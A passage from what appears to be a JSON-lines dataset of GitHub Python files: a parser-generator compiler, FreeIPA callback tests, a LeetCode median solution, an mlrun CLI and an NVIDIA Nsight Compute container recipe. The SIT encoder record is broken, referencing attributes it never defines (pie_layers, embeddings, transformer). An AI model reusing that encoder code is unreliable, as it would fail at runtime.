{\n\t\t\t'initial': table.initial,\n\t\t\t'action': compaction.compress_action_table(table.action_matrix, table.nonassoc_errors),\n\t\t\t'goto': compaction.compress_goto_table(table.goto_matrix),\n\t\t\t'terminals': table.terminals,\n\t\t\t'nonterminals': table.nonterminals,\n\t\t\t'breadcrumbs': [symbol_index[s] for s in table.breadcrumbs],\n\t\t\t'rule': encode_parse_rules(table.rule_table, table.constructors, table.rule_provenance),\n\t\t}\n\t\tif table.splits: form['splits'] = table.splits\n\t\treturn form\n\tdef pretty_print(self):\n\t\tif self.dfa is not None:\n\t\t\tself.dfa.stats()\n\t\t\tself.dfa.display()\n\t\tif self.parse_table is not None:\n\t\t\tself.parse_table.stats()\n\t\t\tself.parse_table.display()\n\tdef report_stats(self):\n\t\tif self.dfa is not None:\n\t\t\tself.dfa.stats()\n\t\tif self.parse_table is not None:\n\t\t\tself.parse_table.stats()\n\tdef make_csv(self, pathstem):\n\t\tif self.dfa is not None:\n\t\t\tself.dfa.make_csv(pathstem)\n\t\tif self.parse_table is not None:\n\t\t\tself.parse_table.make_csv(pathstem)\n\nclass IntermediateForm(NamedTuple):\n\tnfa: finite.NFA\n\tscan_actions: List[ScanAction]\n\thfa: HFA\n\tcfg: ContextFreeGrammar\n\tparse_style:ParsingStyle\n\tdef determinize(self) -> TextBookForm:\n\t\tdfa = self.nfa.subset_construction().minimize_states().minimize_alphabet() if self.nfa.states else None\n\t\tparse_table = tabulate(self.hfa, self.cfg, style=self.parse_style)\n\t\treturn TextBookForm(dfa=dfa, scan_actions=self.scan_actions, parse_table=parse_table)\n\tdef make_dot_file(self, path): self.hfa.make_dot_file(path)\n\n\ndef compile_string(document:str, strict:bool, method=None) -> IntermediateForm:\n\ttext = failureprone.SourceText(document)\n\treturn _compile_text(text, strict, method)\n\ndef compile_file(pathname, *, verbose=False, strict=True, method=None) -> dict:\n\twith(open(pathname)) as fh:\n\t\ttext = failureprone.SourceText(fh.read(), filename=pathname)\n\tintermediate_form = _compile_text(text, strict, method)\n\ttextbook_form = intermediate_form.determinize()\n\tif verbose:\n\t\tprint(\"\\n -- \", pathname, \" --\")\n\t\ttextbook_form.pretty_print()\n\treturn textbook_form.as_compact_form(filename=os.path.basename(pathname))\n\nSTRERROR = {\n\tregular.VariableTrailingContextError: \"Variable size for both stem and trailing context is not currently supported.\",\n}\n\ndef _compile_text(document:failureprone.SourceText, strict:bool, method=None) -> IntermediateForm:\n\t\"\"\" This has the job of reading the specification and building the textbook-form tables. \"\"\"\n\t# The approach is a sort of outside-in parse. The outermost layer concerns the overall markdown document format,\n\t# which is dealt with in the main body of this routine prior to determinizing and serializing everything.\n\t# Each major sub-language is line-oriented and interpreted with one of the following five subroutines:\n\t\n\tdef handle_meta_exception(e: Exception, pattern_text:str):\n\t\tif isinstance(e, regular.PatternError):\n\t\t\traise grammar.DefinitionError('At line %d: %s'%(line_number, STRERROR[type(e)].format(e.args))) from None\n\t\telse:\n\t\t\traise grammar.DefinitionError('At line %d: Malformed pattern.' % line_number) from None\n\n\tdef definitions():\n\t\tname, subexpression = current_line_text.split(None, 1)\n\t\tregular.let_subexpression(env, name, subexpression)\n\t\n\tdef conditions():\n\t\t\"\"\"\n\t\tThe first token will be a condition name. Thereafter, maybe an arrow and one or more included groups.\n\t\tPattern groups named on the LEFT hand side are real start conditions, accessible in the final scanner.\n\t\tThose which appear only on the right hand side are \"virtual\", usable only by inclusion.\n\t\tAt some point it might be nice to add validation that these are all used correctly...\n\t\t\"\"\"\n\t\tname, includes = error_help.parse(current_line_text, line_number, \"condition\")\n\t\tif name in condition_definitions: error_help.gripe('Re-declared scan-condition %r; this is unexpected.'%name)\n\t\tcondition_definitions[name] = includes\n\n\tdef note_pattern(pattern_text):\n\t\t# Now patterns that share a trail length can also share a rule ID number.\n\t\ttry: rule_pattern = regular.analyze_pattern(pattern_text, env)\n\t\texcept regular.PatternError as e:\n\t\t\thandle_meta_exception(e, pattern_text)\n\t\telse: pending_patterns[rule_pattern.trail_code].append(rule_pattern)\n\n\tdef patterns():\n\t\t# This could be done better: a nice exercise might be to enhance the present regex parser to also\n\t\t# grok actual scanner rules as an alternate language start-symbol; such could eliminate some of\n\t\t# this contemptible string hackery and thereby enable things like embedded spaces where they make sense.\n\t\t# Such would also involve hacking the metascanner bootstrap code to track paren depth and recognize\n\t\t# the other tokens that can appear.\n\t\tif current_line_text.endswith('|'):\n\t\t\tpattern_text = current_line_text[:-1].strip()\n\t\t\tif re.search(r'\\s', pattern_text): raise grammar.DefinitionError('Unable to analyze pattern/same-as-next structure at line %d.')\n\t\t\tnote_pattern(pattern_text)\n\t\telse:\n\t\t\tm = re.fullmatch(r'(.*?)\\s*:([A-Za-z][A-Za-z_]*)(?:\\s+([A-Za-z_]+))?(?:\\s+:(0|[1-9][0-9]*))?', current_line_text)\n\t\t\tif not m: raise grammar.DefinitionError('Unable to analyze overall pattern/action/argument/(rank) structure at line %d.'%line_number)\n\t\t\tpattern_text, action, argument, rank_string = m.groups()\n\t\t\tmessage = [action]\n\t\t\tif argument is not None: message.append(argument)\n\t\t\trank = int(rank_string) if rank_string else 0\n\t\t\tnote_pattern(pattern_text)\n\t\t\tfor trail_code, list_of_patterns in pending_patterns.items():\n\t\t\t\trule_id = foundation.allocate(scan_actions, ScanAction(trail_code, message, line_number))\n\t\t\t\tfor rule_pattern in list_of_patterns:\n\t\t\t\t\tdst = nfa.new_node(rank)\n\t\t\t\t\tnfa.final[dst] = rule_id\n\t\t\t\t\tencoder = regular.Encoder(nfa, annotation=rule_pattern.annotation, rank=rank)\n\t\t\t\t\tsrc = encoder(rule_pattern.tree, dst)\n\t\t\t\t\tfor q,b in zip(nfa.condition(current_pattern_group), rule_pattern.bol):\n\t\t\t\t\t\tif b: nfa.link_epsilon(q, src)\n\t\t\tpending_patterns.clear()\n\t\tpass\n\t\n\tdef precedence():\n\t\tebnf.read_precedence_line(current_line_text, line_number)\n\t\n\tdef productions():\n\t\tebnf.read_production_line(current_line_text, line_number)\n\t\n\tdef decide_section():\n\t\t# Looks at a header line to see which parsing mode/section to shift into based on a leading keyword,\n\t\t# and also performs any clerical duties associated with said shift.\n\t\ttokens = ''.join([c if c.isalnum() or c=='_' else ' ' for c in current_line_text]).split()\n\t\tif not tokens: return None\n\t\thead = tokens[0].lower()\n\t\tif head == 'definitions': return definitions\n\t\tif head == 'conditions':\n\t\t\t# The way to handle it is to set up epsilon-connections between the conditions\n\t\t\t# as specified in the source definition, and then delete \"virtual\" conditions\n\t\t\t# from nfa.initial before performing the subset construction. If no \"virtual\"\n\t\t\t# conditions are determined, then there's nothing to delete, and all groups get presented.\n\t\t\treturn conditions\n\t\tif head == 'patterns':\n\t\t\tnonlocal current_pattern_group\n\t\t\tcurrent_pattern_group = tokens[1] if len(tokens)>1 else INITIAL\n\t\t\treturn patterns\n\t\tif head in ('precedence', 'declarations'): return precedence\n\t\tif head == 'productions':\n\t\t\tebnf.current_head = None\n\t\t\tfor t in tokens[1:]:\n\t\t\t\tif t not in ebnf.plain_cfg.start:\n\t\t\t\t\tebnf.plain_cfg.start.append(t)\n\t\t\treturn productions\n\t\treturn None\n\n\t# The context-free portion of the definition:\n\terror_help = grammar.ErrorHelper(document.filename)\n\tebnf = grammar.EBNF_Definition(error_help, strict)\n\t\n\t# The regular (finite-state) portion of the definition:\n\tenv = charset.mode_normal.new_child(document.filename or \"text\")\n\tnfa = finite.NFA()\n\tpending_patterns = collections.defaultdict(list) # Those awaiting an application of the `|` action...\n\tscan_actions = [] # That of a regular-language rule entry is \n\tcurrent_pattern_group = None\n\tcondition_definitions = {}\n\t\n\tdef tie_conditions():\n\t\tdeclared = set(condition_definitions.keys())\n\t\tdeclared.update(*condition_definitions.values())\n\t\tforgot_to_define = declared - set(nfa.initial.keys())\n\t\tif forgot_to_define: raise grammar.DefinitionError('These pattern groups were declared in the conditions block but never defined:\\n'+repr(forgot_to_define))\n\t\tforgot_to_declare = set(nfa.initial.keys()) - declared\n\t\tif forgot_to_declare: raise grammar.DefinitionError('These pattern groups appear, but are not declared in the conditions block:\\n'+repr(forgot_to_declare))\n\t\t# TODO: Check for no cycles in the inclusion graph...\n\t\tvirtual_groups = declared - set(condition_definitions.keys())\n\t\tfor name, includes in condition_definitions.items():\n\t\t\tfor i in includes:\n\t\t\t\tnfa.link_condition(name, i)\n\t\tfor name in virtual_groups:\n\t\t\tdel nfa.initial[name]\n\n\t# Here begins the outermost layer of grammar definition parsing, which is to comprehend the\n\t# structure of a supplied mark-down document just enough to extract headers and code-blocks.\n\tsection, in_code, line_number = None, False, 0\n\tfor current_line_text in document.content.splitlines(keepends=False):\n\t\tline_number += 1\n\t\tif in_code:\n\t\t\tcurrent_line_text = current_line_text.strip()\n\t\t\tif '```' in current_line_text:\n\t\t\t\tin_code = False\n\t\t\t\tif pending_patterns: raise grammar.DefinitionError(\"Consecutive group of patterns lacks a scanner action before end of code block at line %d.\"%line_number)\n\t\t\telif current_line_text and section: section()\n\t\telif current_line_text.startswith('#'): section = decide_section()\n\t\telif current_line_text.strip().startswith('```'): in_code = True\n\t\telse: continue\n\tif in_code and section: raise grammar.DefinitionError(\"A code block fails to terminate before the end of the document.\")\n\t\n\t# Compose the control tables. (Compaction is elsewhere. Serialization will be straight JSON via standard library.)\n\tif condition_definitions: tie_conditions()\n\tcfg = ebnf.sugarless_form()\n\tif method is None:\n\t\thfa = ebnf.method(cfg)\n\telse:\n\t\thfa = method(cfg)\n\tstyle = GeneralizedStyle(len(hfa.graph)) if ebnf.is_nondeterministic else DeterministicStyle(ebnf.is_strict)\n\treturn IntermediateForm(nfa=nfa, scan_actions=scan_actions, hfa=hfa, cfg=cfg, parse_style=style,)\n\ndef encode_parse_rules(rules:list, constructors:list, origins:list) -> dict:\n\tassert isinstance(rules, list), type(rules)\n\treturn {'rules': rules, 'line_number': origins, 'constructor': constructors, }\n\n\n","repo_name":"kjosib/booze-tools","sub_path":"boozetools/macroparse/compiler.py","file_name":"compiler.py","file_ext":"py","file_size_in_byte":12443,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"63"} +{"seq_id":"74267309640","text":"from ipalib import errors\nfrom ipalib.plugins import baseldap\n\n\ndef test_exc_wrapper():\n \"\"\"Test the CallbackInterface._exc_wrapper helper method\"\"\"\n handled_exceptions = []\n\n class test_callback(baseldap.BaseLDAPCommand):\n \"\"\"Fake IPA method\"\"\"\n def test_fail(self):\n self._exc_wrapper([], {}, self.fail)(1, 2, a=1, b=2)\n\n def fail(self, *args, **kwargs):\n assert args == (1, 2)\n assert kwargs == dict(a=1, b=2)\n raise errors.ExecutionError('failure')\n\n instance = test_callback()\n\n # Test with one callback first\n\n @test_callback.register_exc_callback\n def handle_exception(self, keys, options, e, call_func, *args, **kwargs):\n assert args == (1, 2)\n assert kwargs == dict(a=1, b=2)\n handled_exceptions.append(type(e))\n\n instance.test_fail()\n assert handled_exceptions == [errors.ExecutionError]\n\n # Test with another callback added\n\n handled_exceptions = []\n\n def dont_handle(self, keys, options, e, call_func, *args, **kwargs):\n assert args == (1, 2)\n assert kwargs == dict(a=1, b=2)\n handled_exceptions.append(None)\n raise e\n test_callback.register_exc_callback(dont_handle, first=True)\n\n instance.test_fail()\n assert handled_exceptions == [None, errors.ExecutionError]\n\n\ndef test_callback_registration():\n class callbacktest_base(baseldap.CallbackInterface):\n _callback_registry = dict(test={})\n\n def test_callback(self, param):\n messages.append(('Base test_callback', param))\n\n def registered_callback(self, param):\n messages.append(('Base registered callback', param))\n callbacktest_base.register_callback('test', registered_callback)\n\n class SomeClass(object):\n def registered_callback(self, command, param):\n messages.append(('Registered callback from another class', param))\n callbacktest_base.register_callback('test', SomeClass().registered_callback)\n\n class callbacktest_subclass(callbacktest_base):\n pass\n\n def subclass_callback(self, param):\n messages.append(('Subclass registered callback', param))\n callbacktest_subclass.register_callback('test', subclass_callback)\n\n\n messages = []\n instance = callbacktest_base()\n for callback in instance.get_callbacks('test'):\n callback(instance, 42)\n assert messages == [\n ('Base test_callback', 42),\n ('Base registered callback', 42),\n ('Registered callback from another class', 42)]\n\n messages = []\n instance = callbacktest_subclass()\n for callback in instance.get_callbacks('test'):\n callback(instance, 42)\n assert messages == [\n ('Base test_callback', 42),\n ('Subclass registered callback', 42)]\n\n\ndef test_exc_callback_registration():\n messages = []\n class callbacktest_base(baseldap.BaseLDAPCommand):\n \"\"\"A method superclass with an exception callback\"\"\"\n def exc_callback(self, keys, options, exc, call_func, *args, **kwargs):\n \"\"\"Let the world know we saw the error, but don't handle it\"\"\"\n messages.append('Base exc_callback')\n raise exc\n\n def test_fail(self):\n \"\"\"Raise a handled exception\"\"\"\n try:\n self._exc_wrapper([], {}, self.fail)(1, 2, a=1, b=2)\n except Exception:\n pass\n\n def fail(self, *args, **kwargs):\n \"\"\"Raise an error\"\"\"\n raise errors.ExecutionError('failure')\n\n base_instance = callbacktest_base()\n\n class callbacktest_subclass(callbacktest_base):\n pass\n\n @callbacktest_subclass.register_exc_callback\n def exc_callback(self, keys, options, exc, call_func, *args, **kwargs):\n \"\"\"Subclass's private exception callback\"\"\"\n messages.append('Subclass registered callback')\n raise exc\n\n subclass_instance = callbacktest_subclass()\n\n # Make sure exception in base class is only handled by the base class\n base_instance.test_fail()\n assert messages == ['Base exc_callback']\n\n\n @callbacktest_base.register_exc_callback\n def exc_callback(self, keys, options, exc, call_func, *args, **kwargs):\n \"\"\"Callback on super class; doesn't affect the subclass\"\"\"\n messages.append('Superclass registered callback')\n raise exc\n\n # Make sure exception in subclass is only handled by both\n messages = []\n subclass_instance.test_fail()\n assert messages == ['Base exc_callback', 'Subclass registered callback']\n","repo_name":"hatchetation/freeipa","sub_path":"tests/test_xmlrpc/test_baseldap_plugin.py","file_name":"test_baseldap_plugin.py","file_ext":"py","file_size_in_byte":4549,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"873017016","text":"class Solution:\n def findMedianSortedArrays(self, nums1: List[int], nums2: List[int]) -> float:\n for i in range(len(nums2)):\n nums1.append(nums2[i])\n nums1.sort()\n print(nums1)\n if len(nums1)%2==0:\n k= int(len(nums1)/2)\n return (nums1[k]+nums1[k-1])/2\n else:\n return float(nums1[int((len(nums1)-1)/2)])\n","repo_name":"oyeadii/leetcodePython","sub_path":"004_medianOfTwoArrays.py","file_name":"004_medianOfTwoArrays.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"33641989076","text":"from os import path\nimport click\nfrom ast import literal_eval\n\nfrom .run import run_start\nfrom .runtimes import RunError\nfrom .utils import run_keys, dict_to_yaml\n\n@click.group()\ndef main():\n pass\n\n@main.command(context_settings=dict(ignore_unknown_options=True))\n@click.argument(\"url\", type=str)\n@click.option('--param', '-p', default='', multiple=True,\n help=\"parameter name and value tuples, e.g. -p x=37 -p y='text'\")\n@click.option('--in-artifact', '-i', multiple=True, help='input artifact')\n@click.option('--out-artifact', '-o', multiple=True, help='output artifact')\n@click.option('--in-path', help='default input path/url (prefix) for artifact')\n@click.option('--out-path', help='default output path/url (prefix) for artifact')\n@click.option('--secrets', '-s', multiple=True, help='secrets file= or env=ENV_KEY1,..')\n@click.option('--uid', help='unique run ID')\n@click.option('--name', help='run name')\n@click.option('--workflow', help='workflow name/id')\n@click.option('--project', help='project name/id')\n@click.option('--rundb', default='', help='save run results to path or DB url')\n@click.option('--runtime', '-r', default='', help='runtime environment e.g. local, remote, nuclio, mpi')\n@click.option('--kfp', is_flag=True, help='running inside Kubeflow Piplines')\n@click.option('--hyperparam', '-x', default='', multiple=True,\n help='hyper parameters (will expand to multiple tasks) e.g. --hyperparam p2=[1,2,3]')\n@click.option('--param-file', default='', help='path to csv table of execution (hyper) params')\n@click.argument('run_args', nargs=-1, type=click.UNPROCESSED)\ndef run(url, param, in_artifact, out_artifact, in_path, out_path, secrets, uid, name,\n workflow, project, rundb, runtime, kfp, hyperparam, param_file, run_args):\n \"\"\"Execute a task and inject parameters.\"\"\"\n\n meta = {}\n set_item(meta, uid, 'uid')\n set_item(meta, name, 'name')\n set_item(meta, project, 'project')\n set_item(meta, workflow, 'workflow')\n\n labels = {}\n set_item(labels, workflow, 'workflow')\n meta['labels'] = labels\n\n if runtime:\n runtime = py_eval(runtime)\n if isinstance(runtime, str):\n runtime = {'kind': runtime}\n else:\n runtime = {'kind': ''}\n\n spec = {'runtime': runtime}\n set_item(spec['runtime'], run_args, 'args', list(run_args))\n set_item(spec['runtime'], url, 'command')\n\n if param:\n spec['parameters'] = fill_params(param)\n if hyperparam:\n hyperparam = fill_params(hyperparam)\n\n set_item(spec, in_artifact, run_keys.input_objects, line2keylist(in_artifact))\n set_item(spec, in_path, run_keys.input_path)\n set_item(spec, out_path, run_keys.output_path)\n set_item(spec, out_artifact, run_keys.output_artifacts, line2keylist(out_artifact))\n set_item(spec, secrets, run_keys.secrets, line2keylist(secrets, 'kind', 'source'))\n\n struct = {'metadata': meta, 'spec': spec}\n try:\n resp = run_start(struct, rundb=rundb, kfp=kfp,\n hyperparams=hyperparam, param_file=param_file)\n except RunError as err:\n print(f'runtime error: {err}')\n exit(1)\n if resp:\n print(dict_to_yaml(resp))\n\n\ndef fill_params(param):\n params_dict = {}\n for param in param:\n i = param.find('=')\n if i == -1:\n continue\n key, value = param[:i].strip(), param[i + 1:].strip()\n if key is None:\n raise ValueError(f'cannot find param key in line ({param})')\n params_dict[key] = py_eval(value)\n return params_dict\n\n\ndef py_eval(data):\n try:\n value = literal_eval(data)\n return value\n except (SyntaxError, ValueError):\n return data\n\n\ndef set_item(struct, item, key, value=None):\n if item:\n if value:\n struct[key] = value\n else:\n struct[key] = item\n\n\ndef line2keylist(lines: list, keyname='key', valname='path'):\n out = []\n for line in lines:\n i = line.find('=')\n if i == -1:\n raise ValueError('cannot find \"=\" in line ({}={})'.format(keyname, valname))\n key, value = line[:i].strip(), line[i + 1:].strip()\n if key is None:\n raise ValueError('cannot find key in line ({}={})'.format(keyname, valname))\n value = path.expandvars(value)\n out += [{keyname: key, valname: value}]\n return out\n\n\nif __name__ == \"__main__\":\n main()\n\n\n","repo_name":"kkasravi/mlrun","sub_path":"mlrun/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":4417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"39423121720","text":"import torch\nfrom torch._C import dtype\nimport torch.nn as nn\nfrom model.embedding_layer import Embeddings\nfrom model.multi_headed_attn import MultiHeadedAttention\nfrom model.position_ffn import PositionwiseFeedForward\nfrom model.position_ffn import ActivationFunction\nfrom model.utils import sequence_mask_\n\nclass SITLayer(nn.Module):\n \"\"\"\n A single layer of the transformer encoder.\n\n Args:\n d_model (int): the dimension of keys/values/queries in\n MultiHeadedAttention, also the input size of\n the first-layer of the PositionwiseFeedForward.\n heads (int): the number of head for MultiHeadedAttention.\n d_ff (int): the second-layer of the PositionwiseFeedForward.\n dropout (float): dropout probability(0-1.0).\n pos_ffn_activation_fn (ActivationFunction):\n activation function choice for PositionwiseFeedForward layer\n \"\"\"\n\n def __init__(self, d_model, heads, d_ff, dropout, attention_dropout,\n pos_ffn_activation_fn=ActivationFunction.relu):\n super(SITLayer, self).__init__()\n\n self.self_attn = MultiHeadedAttention(\n heads, d_model, dropout=attention_dropout)\n self.feed_forward = PositionwiseFeedForward(d_model, d_ff, dropout,\n pos_ffn_activation_fn)\n self.layer_norm = nn.LayerNorm(d_model, eps=1e-6)\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, inputs, mask):\n \"\"\"\n Args:\n inputs (FloatTensor): ``(batch_size, src_len, model_dim)``\n mask (LongTensor): ``(batch_size, 1, src_len)``\n Returns:\n (FloatTensor):\n * outputs ``(batch_size, src_len, model_dim)``\n \"\"\"\n assert mask is not None\n assert inputs.size(0) == mask.size(0)\n assert inputs.size(1) == mask.size(2)\n\n input_norm = self.layer_norm(inputs)\n context, _ = self.self_attn(input_norm, input_norm, input_norm,\n mask=mask)\n out = self.dropout(context) + inputs\n return self.feed_forward(out)\n\n def update_dropout(self, dropout, attention_dropout):\n self.self_attn.update_dropout(attention_dropout)\n self.feed_forward.update_dropout(dropout)\n self.dropout.p = dropout\n\n\nclass SIT(nn.Module):\n \"\"\"\n Args:\n num_layers (int): number of encoder layers\n d_model (int): size of the model\n heads (int): number of heads\n d_ff (int): size of the inner FF layer\n dropout (float): dropout parameters\n embeddings: embeddings to use, should have positional encodings\n pos_ffn_activation_fn (ActivationFunction): activation function choice for PositionwiseFeedForward layer\n\n Returns:\n (torch.FloatTensor, torch.FloatTensor):\n\n * embeddings ``(src_len, batch_size, model_dim)``\n * memory_bank ``(src_len, batch_size, model_dim)``\n \"\"\"\n\n def __init__(self, d_model, heads, d_ff, dropout,\n attention_dropout, num_layers, embedding,\n pos_ffn_activation_fn=ActivationFunction.relu):\n super(SIT, self).__init__()\n self.embedding = embedding\n\n self.padding_idx = embedding.word_padding_idx\n\n self.sit_layers = nn.ModuleList(\n [SITLayer(\n d_model, heads, d_ff, dropout, attention_dropout,\n pos_ffn_activation_fn=pos_ffn_activation_fn)\n for _ in range(num_layers)])\n self.layer_norm = nn.LayerNorm(d_model, eps=1e-6)\n\n def forward(self,sentence_phrases, phrases_len):\n '''\n Args:\n sentence_phrases [batch size X max phrase count X max phrase length]\n phrases_len [batch size X max phrase count]\n Returns:\n out [max phrase count X batch size X model dim]\n lengths [batch size]\n\n '''\n #embed nodes and leaves and generate L,N\n batch_size = sentence_phrases.size(0)\n assert batch_size == phrases_len.size(0)\n max_phrase_count = phrases_len.size(1)\n assert max_phrase_count == sentence_phrases.size(1)\n\n out = self.embed_phrases(sentence_phrases, phrases_len)\n\n lengths = (phrases_len!=0).sum(dim=1)\n mask = ~sequence_mask_(lengths).unsqueeze(1)\n # Run the forward pass of every layer.\n for layer in self.pie_layers:\n out = layer(out, mask)\n out = self.layer_norm(out)\n assert out.shape[1] == lengths.max()\n\n return out.transpose(0, 1).contiguous(), lengths\n\n def embed_phrases(self, sentence_phrases, phrases_len):\n '''\n Args:\n sentence_phrases [batch size X max phrase count X max phrase length]\n phrases_len [batch size X max phrase count]\n Returns:\n [batch size X max phrase count X model dim]\n '''\n emb = self.embedding(sentence_phrases.unsqueeze(-1).contiguous())\n emb = emb.sum(dim=2)/(phrases_len.unsqueeze(-1) + 1e-10)\n return emb\n\n def update_dropout(self, dropout, attention_dropout):\n self.embeddings.update_dropout(dropout)\n for layer in self.transformer:\n layer.update_dropout(dropout, attention_dropout)","repo_name":"Shikhar-S/Segmented-Invocation-Transformer","sub_path":"src/model/segment_encoder.py","file_name":"segment_encoder.py","file_ext":"py","file_size_in_byte":5254,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"70946454601","text":"from __future__ import absolute_import\nfrom __future__ import unicode_literals\nfrom __future__ import print_function\nimport os\n\nfrom distutils.version import StrictVersion\nimport posixpath\n\nimport hpccm.config\nimport hpccm.templates.envvars\n\nfrom hpccm.building_blocks.base import bb_base\nfrom hpccm.building_blocks.packages import packages\nfrom hpccm.building_blocks.generic_build import generic_build\nfrom hpccm.common import cpu_arch, linux_distro\nfrom hpccm.primitives.comment import comment\nfrom hpccm.primitives.environment import environment\n\nclass nsight_compute(bb_base, hpccm.templates.envvars):\n \"\"\"The `nsight_compute` building block downloads and installs the\n [NVIDIA Nsight Compute\n profiler]](https://developer.nvidia.com/nsight-compute).\n\n # Parameters\n\n eula: Required, by setting this value to `True`, you agree to the\n Nsight Compute End User License Agreement that is displayed when\n running the installer interactively. The default value is\n `False`.\n\n ospackages: List of OS packages to install prior to building.\n When using a runfile, the default values are `perl` for Ubuntu and\n `perl` and `perl-Env` for RHEL-based Linux distributions.\n Otherwise, the default values are `apt-transport-https`,\n `ca-certificates`, `gnupg`, and `wget` for Ubuntu and an empty\n list for RHEL-based Linux distributions.\n\n prefix: The top level install prefix. The default value is\n `/usr/local/NVIDIA-Nsight-Compute`. This parameter is ignored\n unless `runfile` is set.\n\n runfile: Path or URL to NSight Compute's `.run` file relative to the\n local build context. The default value is empty.\n\n version: the version of Nsight Compute to install. Note when\n `runfile` is set this parameter is ignored. The default value is\n `2022.4.0`.\n\n # Examples\n\n ```python\n nsight_compute(version='2020.4.0')\n ```\n\n ```python\n nsight_compute(eula=True, runfile='nsight-compute-linux-2020.2.0.18-28964561.run')\n ```\n\n \"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"Initialize building block\"\"\"\n\n super(nsight_compute, self).__init__(**kwargs)\n\n self.__arch_label = '' # Filled in __cpu_arch\n self.__distro_label = '' # Filled in by __distro\n self.__eula = kwargs.get('eula', False)\n self.__ospackages = kwargs.get('ospackages', [])\n self.__prefix = kwargs.get('prefix',\n '/usr/local/NVIDIA-Nsight-Compute')\n self.__runfile = kwargs.get('runfile', None)\n self.__version = kwargs.get('version', '2022.4.0')\n self.__wd = kwargs.get('wd', posixpath.join(\n hpccm.config.g_wd, 'nsight_compute')) # working directory\n\n # Set the Linux distribution specific parameters\n self.__distro()\n\n # Disables deployment of section files to prevent warning\n # when there is no home or home is read-only:\n self.environment_variables[\n 'NV_COMPUTE_PROFILER_DISABLE_STOCK_FILE_DEPLOYMENT'\n ] = '1'\n\n if self.__runfile:\n # Runfile based installation\n if not self.__eula:\n raise RuntimeError('Nsight Compute EULA was not accepted.')\n\n self.__instructions_runfile()\n\n else:\n # Package repository based installation\n\n # Set the CPU architecture specific parameters\n self.__cpu_arch()\n\n # Fill in container instructions\n self.__instructions_repository()\n\n def __cpu_arch(self):\n \"\"\"Based on the CPU architecture, set values accordingly. A user\n specified value overrides any defaults.\"\"\"\n\n if hpccm.config.g_cpu_arch == cpu_arch.AARCH64:\n self.__arch_label = 'arm64'\n elif hpccm.config.g_cpu_arch == cpu_arch.PPC64LE:\n if hpccm.config.g_linux_distro == linux_distro.UBUNTU:\n self.__arch_label = 'ppc64el'\n else:\n self.__arch_label = 'ppc64le'\n elif hpccm.config.g_cpu_arch == cpu_arch.X86_64:\n if hpccm.config.g_linux_distro == linux_distro.UBUNTU:\n self.__arch_label = 'amd64'\n else:\n self.__arch_label = 'x86_64'\n else: # pragma: no cover\n raise RuntimeError('Unknown CPU architecture')\n\n def __distro(self):\n \"\"\"Based on the Linux distribution, set values accordingly. A user\n specified value overrides any defaults.\"\"\"\n\n if hpccm.config.g_linux_distro == linux_distro.UBUNTU:\n if not self.__ospackages:\n if self.__runfile:\n self.__ospackages = ['perl', 'wget']\n else:\n self.__ospackages = ['apt-transport-https',\n 'ca-certificates', 'gnupg', 'wget']\n\n if hpccm.config.g_linux_version >= StrictVersion('22.04'):\n self.__distro_label = 'ubuntu2204'\n elif hpccm.config.g_linux_version >= StrictVersion('20.04'):\n self.__distro_label = 'ubuntu2004'\n elif hpccm.config.g_linux_version >= StrictVersion('18.0'):\n self.__distro_label = 'ubuntu1804'\n else:\n self.__distro_label = 'ubuntu1604'\n\n elif hpccm.config.g_linux_distro == linux_distro.CENTOS:\n if not self.__ospackages:\n if self.__runfile:\n self.__ospackages = ['perl', 'perl-Env', 'wget']\n\n if hpccm.config.g_linux_version >= StrictVersion('8.0'):\n self.__distro_label = 'rhel8'\n else:\n self.__distro_label = 'rhel7'\n\n else: # pragma: no cover\n raise RuntimeError('Unknown Linux distribution')\n\n def __instructions_repository(self):\n \"\"\"Fill in container instructions\"\"\"\n\n self += comment('NVIDIA Nsight Compute {}'.format(self.__version))\n\n if self.__ospackages:\n self += packages(ospackages=self.__ospackages)\n\n self += packages(\n apt_keys=['https://developer.download.nvidia.com/devtools/repos/{0}/{1}/nvidia.pub'.format(self.__distro_label, self.__arch_label)],\n apt_repositories=['deb [signed-by=/usr/share/keyrings/nvidia.gpg] https://developer.download.nvidia.com/devtools/repos/{0}/{1}/ /'.format(self.__distro_label, self.__arch_label)],\n # https://github.com/NVIDIA/hpc-container-maker/issues/367\n force_add_repo=True,\n ospackages=['nsight-compute-{}'.format(self.__version)],\n yum_keys=['https://developer.download.nvidia.com/devtools/repos/{0}/{1}/nvidia.pub'.format(self.__distro_label, self.__arch_label)],\n yum_repositories=['https://developer.download.nvidia.com/devtools/repos/{0}/{1}'.format(self.__distro_label, self.__arch_label)],\n _apt_key=False)\n\n # The distro packages do not link nsight-compute binaries to /usr/local/bin\n self.environment_variables['PATH'] = '/opt/nvidia/nsight-compute/{}:$PATH'.format(self.__version)\n self += environment(variables=self.environment_step())\n\n def __instructions_runfile(self):\n \"\"\"Fill in container instructions\"\"\"\n\n pkg = os.path.basename(self.__runfile)\n\n install_cmds = [\n 'sh ./{} --nox11 -- -noprompt -targetpath={}'.format(\n pkg, self.__prefix)\n ]\n\n # Commands needed to predeploy target-specific files. When\n # connecting through the GUI on another machine to the\n # container, this removes the need to copy the files over.\n install_cmds += [\n 'mkdir -p /tmp/var/target',\n 'ln -sf {}/target/* /tmp/var/target'.format(self.__prefix),\n 'ln -sf {}/sections /tmp/var/'.format(self.__prefix),\n 'chmod -R a+w /tmp/var'\n ]\n\n kwargs = {}\n if self.__runfile.strip().startswith(('http://', 'https://')):\n kwargs['url'] = self.__runfile\n else:\n kwargs['package'] = self.__runfile\n\n self.__bb = generic_build(\n annotations={'runfile': pkg},\n base_annotation=self.__class__.__name__,\n comment = False,\n devel_environment={'PATH': '{}:$PATH'.format(self.__prefix)},\n directory=self.__wd,\n install=install_cmds,\n unpack=False,\n wd=self.__wd,\n **kwargs\n )\n\n self += comment('NVIDIA Nsight Compute {}'.format(pkg), reformat=False)\n self += packages(ospackages=self.__ospackages)\n self += 